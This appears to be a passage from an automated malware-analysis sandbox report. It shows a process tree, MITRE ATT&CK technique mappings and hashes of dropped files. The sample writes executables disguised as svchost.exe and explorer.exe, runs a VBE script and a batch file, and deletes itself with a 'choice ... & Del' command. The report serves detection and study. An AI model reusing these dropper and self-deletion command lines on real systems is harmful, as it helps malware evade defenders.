C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 010⤵
- Power Settings
PID:5156
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe9⤵PID:2992
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "sjrcqeodaodte"10⤵PID:4384
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost.exe"6⤵PID:5420
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Suspicious use of SetWindowsHookEx
PID:5440
-
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 37⤵PID:5680
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Users\Admin\AppData\Local\Temp\explorer.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Users\Admin\AppData\Local\Temp\explorer.exeC:\Users\Admin\AppData\Local\Temp\explorer.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1584 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1992
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Users\Admin\AppData\Local\Temp\windowshost.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3968 -
C:\Users\Admin\AppData\Local\Temp\windowshost.exeC:\Users\Admin\AppData\Local\Temp\windowshost.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\driverPerf\DDCzSbk7D28EdFKaphOM.vbe"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3520 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\driverPerf\lG0LQTEIJKvWsYHAg5CgQ5boB.bat" "6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\driverPerf\cominto.exe"C:\driverPerf\cominto.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:912
-
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3636
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3836
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4024
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4160
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:1516
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:3360
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1016
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:1504
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4828
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:1780
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2632
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1940
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:3196
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3856
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1660
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2524
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:4992
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv AXB8u4d2VU2ngd5X/ofl0Q.0.21⤵PID:5208
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Create or Modify System Process
2Windows Service
2Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
1Obfuscated Files or Information
1Command Obfuscation
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
539B
MD58ee0f3b0e00f89f7523395bb72e9118b
SHA1bec3fa36a1fb136551dc8157a4963ba5d2f957d4
SHA2568c5f958972fce1812970a1f8da8ccef94a86663d42d13e296813673638a6b68b
SHA51255f862beb42fa76ca118b2c76c92cb1e0a2586727c602645d0d4bd0e8f2120cfc2015f4333df67f3bd9f4eda8b9b399774461ab558f08312920a1489acf7a207
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
17KB
MD53cb5b061d6c96ee444f8799d9857049b
SHA179af989b8513adca5cc19820e3298d280ffce0f9
SHA2568237c8873ecc70fb15a340f3ef41955059e0451450185940d47fbe5907ce1a76
SHA5125ac49af91fb9478189561efc650eea29d911138015e35464e8f97e3408ef03db1b7ba2a317b2415048d8f53aded73931bc144abf183b491bc79242342c8309e3
-
Filesize
944B
MD59b80cd7a712469a4c45fec564313d9eb
SHA16125c01bc10d204ca36ad1110afe714678655f2d
SHA2565a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584
-
Filesize
18KB
MD515a3333105ee87c5881aba190717115e
SHA12593e5aa40bfd51ec7d507dd82ebadaf4b2f9c74
SHA256521c254195f624ed4479e01fc82b7943480dfcc804f28a8b04d5fc0001be6e73
SHA512819f6f8e980f34a7b0a29cc7a215201f7f64a0c5bb6374f88c28d8861ed7ec1bfdb90c67375a440255bfc1d680e88bfaf79c433fd9b5638d38d3dcefe65cae27
-
Filesize
18KB
MD566438c018ef632cf11b5c638e5d97f22
SHA1be477e49129b718c28d4d5e326bf43c5ed12fa83
SHA2569ec582f5eb024e57a91148e7df33cd4c5e02cd3a6ee393997364e519867c7215
SHA512178dba926a0764bd518202cfea8061fc5e5295c5b81775ad2397ee10dcddbf0200eb5a9a00116f123766aba052bda33922e2debffe4d0c554df906977d52067e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
95KB
MD519eab19c0d0a0b062c8eb85a94a79cc6
SHA13f0e2e88b9ff61e2e56edc473861cc4373af525a
SHA25602eb6c61b19d347b9b6846285991142bb0d7515401f8fc4cf7f961be72a3c215
SHA512550b2aa4b1892643f4a06d9df302f5685e9275ca9b302b8467fd35af806add36fe6ba6202488ea6209ee1b4a79f638d5f6e729bcf4a1b73fd38c4d4570b28223
-
Filesize
2.1MB
MD5fa0429acc4b9cfd414d24fae0e299790
SHA180d76038b5401080e18e6b015cbf806d9abe8589
SHA2561440a0bb2287c84bc89c40255413dc2cab070a4382b59e9cffaa3abfe7da5489
SHA512f6af06d7c505ab4d23a80fe616422302c5a87bfbefc81d6b0f4af36fcf86f30f865dcb4806581799a139f1b965c8d3b842125ac0b4c9a8ea59469601d9edff9e
-
Filesize
2.8MB
MD551ab765a1b1f884f936db4ffc642d728
SHA17b7741bf5dfeaed3860bf308733490017688fa46
SHA256816835537df73c3297cb1a0ddfe02d8f051f0fd9486ee2b1e53969b37fa87f14
SHA512e25fdd4a7f4fd8bfe9491ec8138ed08077c2c2cd63686e6e4a59859e27294cc35d0ff99ff0b29ae3c2901c6f99e970f6d8e80435d86811398fdb41cf1bbb5234
-
Filesize
5KB
MD5688d33ab9cc93e29079ffa6212dc94f6
SHA1cccda262d7c2d8d82c1529d00b3b158c06baba3d
SHA2561f2738e7c475ee01d2c15f570aac598467355024c2441e86a7d3ffac01788226
SHA512edd59e0559c226d970d2a6b18f418b67bcf583ed746c823bae2ca370c0e4ca5d5bd7af357822a638329878e865494e3c8dd66a36ed34f93b1b18846dc59adb6c
-
Filesize
5KB
MD56c57f591aab7fd6a2b710e41c461a239
SHA11138c827dd5e1ef568573965309243522ee28b0b
SHA256425461325cfc47ade3f906d1d6b9e39ab164117e3258d34ba5414728ed91bbe0
SHA51212289c64b14c483c033c48237d4ebd33755972a581d57b94307c016edbe85119627095d00b72da1b909de4dcf7b6a849982fa11bad7e1ad1f761c974c6aadcaf
-
Filesize
3KB
MD590da204b95e863dc622c45cf157c5bf6
SHA1ce345b6a1834178a4db5ed785757d5c685aafc69
SHA25694b5cd9d7d639e6d610b1404282d6a81a2e13867bf2f1379d449d490deaaf61f
SHA512ce2735f4b888672761358c050256cc6239e25e225bd2443f0bdd59975f1a38267cf791419d567d194c2d767afb7edb9c28cc86e4a00371303b6f7377827bc949
-
Filesize
212B
MD576764afd7b394cd6a9c36fa16d4c88fc
SHA15274a18139edf134230252c97652bfa6319b1a78
SHA256e58f2652ec82227d6ecacc733adb6e9812fcb39283ef87aba2be65326851e50e
SHA5123018cbc23b59527b0fe54fc17f13735dddf2e91ac188afb7abdb6fc932e2a965d725b0ffaa8b03fcc7c9f4fbd9f1ba3aafde6a2e3fe1112ccbe42fca44be01ae
-
Filesize
2.5MB
MD54344aa160852993fab07ae5793321886
SHA1d33a04a9f58d6172bfaa611ceeb03b24b7c5bee5
SHA256bbbebdfec732e0805dc3865cfa2f546120e7300d8d6d98ba71ca85026375add4
SHA512557c569a182284d43db1342aaa64b61acae4665548fa2a7c63af05d45ae1058d070f536c6c80a859e54a051177d21cc21c86b3de4cb03d1d63c993495067d2c0
-
Filesize
27B
MD561b88edb5f6dca914ee05650653d8223
SHA14b61f3f21e8c981aaa73e375d090de82be46720d
SHA256eba6d05af3adbcc9a111fe968c3a2c725221f8f7896df3490bc2509bec01cf12
SHA5121eea3fe2ca12c0d9bc3f9a7a13a1438cdd25e35607232025477af885db7987f6cd4d03613e6be0f6c8457e9db3eaf9b394f62ed14dffa4fbb36c1c07d8e5e7b5